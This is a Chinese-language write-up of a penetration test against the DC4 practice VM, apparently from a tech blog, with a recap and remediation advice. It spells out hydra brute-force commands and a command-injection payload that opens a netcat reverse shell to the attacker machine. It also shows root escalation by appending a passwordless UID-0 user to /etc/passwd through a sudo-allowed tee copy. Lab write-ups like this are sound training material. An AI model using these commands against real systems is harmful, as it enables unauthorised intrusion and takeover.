DC4靶机的渗透测试与复盘
DC4靶机的渗透测试与复盘本次渗透测试针对DC4靶机通过nmap扫描发现Nginx服务和SSH端口。网站为一个System Tools登录页面使用hydra爆破出admin/happy密码进入后台发现命令执行功能存在命令注入漏洞通过修改radio参数反弹shell获得www-data权限。信息收集发现jim用户目录下有密码字典利用hydra爆破jim的SSH密码jibril04。查看邮件获取charles的密码最终利用charles用户的sudo teehee权限向/etc/passwd写入新用户提权至root。一、环境准备下载DC4靶机导入VM设置为NAT模式Kali也设置为NAT模式。靶机IP192.168.123.140攻击机IP192.168.123.139。二、信息收集用nmap扫描靶机开放端口nmap -A -p- 192.168.123.140发现开放了两个端口22SSH和80HTTP80端口是 nginx 1.15.10页面标题为“System Tools”。访问http://192.168.123.140/只有一个登录框。用 dirsearch 扫目录dirsearch -u http://192.168.123.140/ --exclude-status404,403发现/command.php、/login.php、/logout.php等文件说明登录后可能有命令相关功能。三、暴力破解使用 hydra 对登录页面进行爆破不知道用户名是什么但是基于经验基本为admin于是进行尝试hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.123.140 http-post-form /login.php:username^USER^password^PASS^:Slogout -F成功爆破出密码happy。用admin / happy登录后台。四、命令注入漏洞利用登录后看到三个命令选项List Files、Disk Usage、Disk Free。点击run发现会显示对应的的结果。用 Burp Suite 抓包发现提交的参数为radiols-l。尝试在参数后面拼接命令radiols -l;idsubmitRun成功执行id命令返回uid33(www-data)确认存在命令注入漏洞。在攻击机开启监听nc -lvnp 4444通过修改 radio 参数反弹 shellradiols -l;nc 192.168.123.139 4444 -e /bin/bashsubmitRun成功获得www-data权限的 shell。五、信息收集与横向移动查看/home目录发现三个用户charles、jim、sam。在 jim 的目录中发现backups/old-passwords.bak密码字典文件。将密码字典复制到攻击机用 hydra 爆破 jim 的 SSH 密码hydra -l jim -P /home/kali/Desktop/dc4.txt ssh://192.168.123.140成功爆破出密码jibril04。SSH 登录 jimssh jim192.168.123.140六、邮件信息收集登录 jim 后提示You have mail.查看邮件cat /var/mail/jim发现 Charles 发给 jim 的一封邮件里面写道I’m heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.Password is: ^xHhAhvim0y获取到 Charles 的密码。七、sudo 提权切换到 charles 用户su - charles密码^xHhAhvim0y检查 sudo 权限sudo -l发现 charles 可以无密码以 root 权限执行/usr/bin/teehee。teehee就是tee命令可以追加写入文件。利用它往/etc/passwd中添加一个 UID0 的 root 用户echo peng::0:0:::/bin/bash | sudo teehee -a /etc/passwd然后直接切换过去su peng成功获得root 权限八、获取 flagcd /root cat flag.txt拿到最终的 flag。九、渗透复盘完整攻击链信息收集nmap→ 发现 Nginx SSH ↓ hydra 爆破 → admin/happy 登录后台 ↓ 发现命令执行功能 → Burp 抓包修改 radio 参数 → 命令注入 ↓ 反弹 shell → 获得 www-data 权限 ↓ 发现 old-passwords.bak → hydra 爆破 jim 的 SSH 密码 ↓ SSH 登录 jim → 查看邮件获取 charles 密码 ↓ 切换到 charles → sudo -l 发现 teehee 提权 ↓ echo peng::0:0:::/bin/bash | sudo teehee -a /etc/passwd → su peng → root!核心知识点hydra 爆破— 使用Slogout作为成功标记精准爆破命令注入— 参数未过滤直接拼接系统命令横向移动— 从 www-data → jim → charles 逐层突破邮件信息泄露— 用户密码通过邮件明文传递teehee 提权— 利用sudo tee -a追加写入/etc/passwd添加 root 用户安全修复建议登录页面加验证码或限制尝试次数— 防止 hydra 暴力破解命令执行参数做白名单校验— 不允许拼接额外命令禁止邮件中明文传输密码— 密码应通过安全通道传递sudo 权限最小化— teehee 不应赋予 NOPASSWD 的 root 权限

相关新闻

AI批注工具开发:Python与NLP在教育中的应用

AI批注工具开发:Python与NLP在教育中的应用

1. 项目概述:AI批注工具如何改变教育场景去年帮一位中学教师朋友处理期末报告时,我亲眼见证了这个场景:深夜11点的办公室,桌上堆着近百份Word格式的学生报告,红笔和咖啡杯并排放在显示器旁。这种场景催生了我开发AI批注…

2026/7/23 10:54:14 阅读更多 →
MSPM0 SPI中断与DMA触发机制深度解析与实战配置

MSPM0 SPI中断与DMA触发机制深度解析与实战配置

1. 项目概述与核心价值 在嵌入式系统开发中,尤其是面对传感器数据采集、显示屏刷新或高速外设通信这类任务时,CPU如果深陷于搬运数据的泥潭,整个系统的实时性和能效就会大打折扣。这时, 中断 和 直接内存访问 就成了工程师手中…

2026/7/23 10:54:14 阅读更多 →
文搞懂 LLM 的 Transformer!看完能和别人吹一年

文搞懂 LLM 的 Transformer!看完能和别人吹一年

这篇论文首次提出的 Transformer 架构,已经成为当下所有大模型的基础。 今天我们就从这篇最初的论文出发,真正理解下 Transformer 究竟是何方神圣。 本文不讨论公式,只解读图表,旨在让更多读者看完就能通俗地、成体系地给身边其他…

2026/7/23 10:54:14 阅读更多 →

最新新闻

10f7转换包:高效实现12种数据格式互转的解决方案

10f7转换包:高效实现12种数据格式互转的解决方案

1. 项目背景与需求解析 10f7转换包是近期在开发者社区中频繁出现的一个工具包,主要用于解决不同数据格式之间的转换问题。作为一名长期处理数据对接的开发人员,我最近在实际项目中遇到了几个典型场景: 需要将老旧的CSV报表转换为JSON格式供新…

2026/7/23 11:17:24 阅读更多 →
Cola AI编程助手:July限免版实战指南与开发效率提升

Cola AI编程助手:July限免版实战指南与开发效率提升

如果你最近在关注 AI 编程助手领域,可能会发现一个现象:新模型层出不穷,但真正能在实际开发中显著提升效率的却不多。很多工具要么是"玩具级"的简单代码补全,要么是"专家级"的高门槛产品,很少有能…

2026/7/23 11:17:24 阅读更多 →
AI模型选型决策树:从57个开源模型中精准筛选出最适合你团队的3款,附实测性能对比表(2024Q2最新)

AI模型选型决策树:从57个开源模型中精准筛选出最适合你团队的3款,附实测性能对比表(2024Q2最新)

更多请点击: https://codechina.net 第一章:AI模型选型决策树:从57个开源模型中精准筛选出最适合你团队的3款,附实测性能对比表(2024Q2最新) 面对2024年第二季度激增的57个主流开源大语言模型(…

2026/7/23 11:17:24 阅读更多 →
链式思考(CoT)在智能编程中的实践与优化

链式思考(CoT)在智能编程中的实践与优化

1. 链式思考(CoT)在Claude Code中的核心价值在Claude Code这类智能编程助手中,链式思考(Chain-of-Thought,简称CoT)提示技术正在改变开发者与AI的协作方式。不同于传统单轮问答,CoT通过显式要求…

2026/7/23 11:17:24 阅读更多 →
学术论文AI生成痕迹检测与自查方法详解

学术论文AI生成痕迹检测与自查方法详解

1. 项目背景与核心需求去年帮导师审稿时遇到一篇"完美"论文,结构工整、表述流畅,但总觉得哪里不对劲。后来用专业工具检测才发现,全文62%的内容存在AI生成特征。这件事让我意识到:在学术写作中,提前识别AI生…

2026/7/23 11:17:24 阅读更多 →
智能音视频前端:AI 辅助的字幕生成与内容审核界面

智能音视频前端:AI 辅助的字幕生成与内容审核界面

智能音视频前端&#xff1a;AI 辅助的字幕生成与内容审核界面 一、音视频前端的 AI 集成挑战&#xff1a;Web Worker 资源分配与实时性平衡 音视频前端是浏览器中资源消耗最高的场景之一。一个典型的视频编辑页面需要同时处理&#xff1a;<video> 元素的播放控制、Canvas…

2026/7/23 11:16:24 阅读更多 →

日新闻

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

更多请点击&#xff1a; https://intelliparadigm.com 第一章&#xff1a;从单点好评到指数级传播&#xff1a;AI副业主理人必须掌握的4层口碑渗透模型&#xff08;含ROI测算表&#xff09; 当AI副业主理人不再仅满足于单次服务交付&#xff0c;而是主动构建可复用、可裂变、可…

2026/7/23 0:00:25 阅读更多 →
AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析

AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析

更多请点击&#xff1a; https://codechina.net 第一章&#xff1a;AI写作开头钩子设计&#xff1a;为什么你的AI文案完读率不足18%&#xff1f;——基于2,346篇A/B测试报告的归因分析 在对2,346篇跨行业AI生成文案的A/B测试数据进行聚类分析后&#xff0c;我们发现&#xff1…

2026/7/23 0:01:26 阅读更多 →
Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南&#xff1a;免费开源的终极点对点安全聊天工具 【免费下载链接】chitchatter Secure peer-to-peer chat that is serverless, decentralized, and ephemeral 项目地址: https://gitcode.com/gh_mirrors/ch/chitchatter Chitchatter是一款革命性的安…

2026/7/23 0:01:26 阅读更多 →

周新闻

Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中&#xff0c;我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源&#xff0c;还是配置文件、证书等&#xff0c;都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下&#xff0c;但这…

2026/7/22 8:58:19 阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP&#xff08;轻量级目录访问协议&#xff09;作为企业级身份认证的黄金标准&#xff0c;已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时&#xff0c;发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/22 19:43:43 阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击&#xff1a; https://intelliparadigm.com 第一章&#xff1a;AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”&#xff0c;而是以可解释、可审计、可迭代的方式&#xff0c;赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/22 12:54:44 阅读更多 →

月新闻